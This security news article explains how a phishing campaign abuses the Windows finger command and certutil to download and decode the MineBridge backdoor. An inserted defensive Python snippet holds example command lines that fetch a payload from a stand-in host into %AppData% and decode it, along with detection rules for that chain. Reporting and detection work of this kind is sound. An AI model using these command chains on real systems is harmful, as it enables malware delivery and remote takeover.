Attackers are using the normally innocuous Windows 10 Finger command to download and install a malicious backdoor on victims' devices.

The ‘Finger’ command originated on Linux/Unix operating systems; it lets a local user retrieve a list of the users on a remote machine, or information about a specific remote user. In addition to Linux, Windows includes a finger.exe command that performs the same function.

To run the Windows 10 Finger command, the user enters

finger [user]@[remote_host]

For instance:

finger [email protected]

In September, we reported that security researchers had found a way to use Finger as a LoLBin to download malware from a remote computer or to exfiltrate data. LoLBins (living-off-the-land binaries) are legitimate programs that attackers can abuse to bypass security controls and retrieve malware without triggering a security alert on the system.

The Windows 10 Finger command used in an active malware campaign

Later that week, security researcher Kirk Sayre found a phishing campaign that uses the Finger command to download the MineBridge backdoor malware.


FireEye first detailed the MineBridge malware after discovering several phishing campaigns targeting South Korean organizations. Those phishing emails contain malicious Word documents disguised as job applicants' resumes that install the MineBridge malware.

Like the earlier MineBridge campaigns seen by FireEye, the one found by Sayre also claims to be a resume from a job applicant.

When the victim clicks the ‘Enable Editing’ or ‘Enable Content’ button, a password-protected macro executes to download the MineBridge malware and run it.


The macro executes a deobfuscated command that uses the Finger command to download a Base64-encoded certificate from a remote server and save it as %AppData%\vUCooUr.

The ‘certificate’ retrieved through the Finger command on Windows is actually a Base64-encoded malware downloader executable. It is decoded with the certutil.exe command, saved as %AppData%\vUCooUr.exe, and then executed.

Once executed, the downloader downloads a TeamViewer executable and uses DLL hijacking to sideload a malicious DLL, which is the MineBridge malware itself.
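A defender-side illustration of the chain just described, added here and not from the original article or FireEye's report: it scans constructed Sysmon-style process-creation records for a finger.exe execution followed by a certutil -decode that writes into %AppData%, and flags Office processes spawning shells. The host names, timestamps, the example-c2.invalid domain and the record layout are all assumptions made for the example.

```python
from collections import defaultdict

# Constructed Sysmon-style process-creation events (not real telemetry);
# each record: host, timestamp in seconds, parent image, image, command line.
SAMPLE_EVENTS = [
    ("ws01", 100, "explorer.exe", "winword.exe", "WINWORD.EXE resume.docx"),
    ("ws01", 105, "winword.exe", "cmd.exe", "cmd /c finger user@example-c2.invalid > %AppData%\\vUCooUr"),
    ("ws01", 106, "cmd.exe", "finger.exe", "finger user@example-c2.invalid"),
    ("ws01", 110, "cmd.exe", "certutil.exe", "certutil -decode %AppData%\\vUCooUr %AppData%\\vUCooUr.exe"),
    ("ws02", 200, "explorer.exe", "cmd.exe", "cmd /c certutil -hashfile setup.msi SHA256"),  # benign use
    ("ws03", 300, "cmd.exe", "finger.exe", "finger alice@intranet.example"),              # finger alone
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

def suspicious(ev):
    """Return the indicator tags that apply to one process-creation event."""
    host, ts, parent, image, cmdline = ev
    low = cmdline.lower()
    tags = []
    if image == "finger.exe":
        tags.append("finger_exec")          # finger.exe is rare on managed workstations
    if image == "certutil.exe" and "-decode" in low:
        tags.append("certutil_decode")      # Base64 decode of a dropped "certificate"
        if "appdata" in low:
            tags.append("writes_appdata")   # decoded payload lands in the user profile
    if parent in OFFICE_PARENTS and image in {"cmd.exe", "powershell.exe", "finger.exe"}:
        tags.append("office_spawns_shell")  # macro launching a command interpreter
    return tags

def correlate(events, window=300):
    """Group tagged events per host and raise 'chain' when a finger.exe run is
    followed by a certutil -decode on the same host within `window` seconds."""
    per_host = defaultdict(list)
    for ev in events:
        tags = suspicious(ev)
        if tags:
            per_host[ev[0]].append((ev[1], tags))
    alerts = {}
    for host, hits in per_host.items():
        finger_ts = [t for t, tags in hits if "finger_exec" in tags]
        decode_ts = [t for t, tags in hits if "certutil_decode" in tags]
        chained = any(0 <= d - f <= window for f in finger_ts for d in decode_ts)
        alerts[host] = {"chain": chained,
                        "tags": sorted({tg for _, tags in hits for tg in tags})}
    return alerts

if __name__ == "__main__":
    for host, result in correlate(SAMPLE_EVENTS).items():
        print(host, result)
```

Only ws01 produces the full finger-then-decode chain; ws03 shows that a lone finger.exe run is a weaker signal worth reviewing but not the same alert, and the benign certutil -hashfile on ws02 is not flagged at all.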

Once MineBridge is loaded, the attacker gains full control of the computer, which lets them listen in through the infected system’s microphone and carry out other malicious operations.

FireEye further explains that the two C2 methods together support commands for downloading arbitrary files, self-deletion and updating, process listing, shutting down and rebooting the system, downloading and executing payloads, executing arbitrary shell commands, process elevation, turning TeamViewer’s microphone on or off, and gathering system UAC information.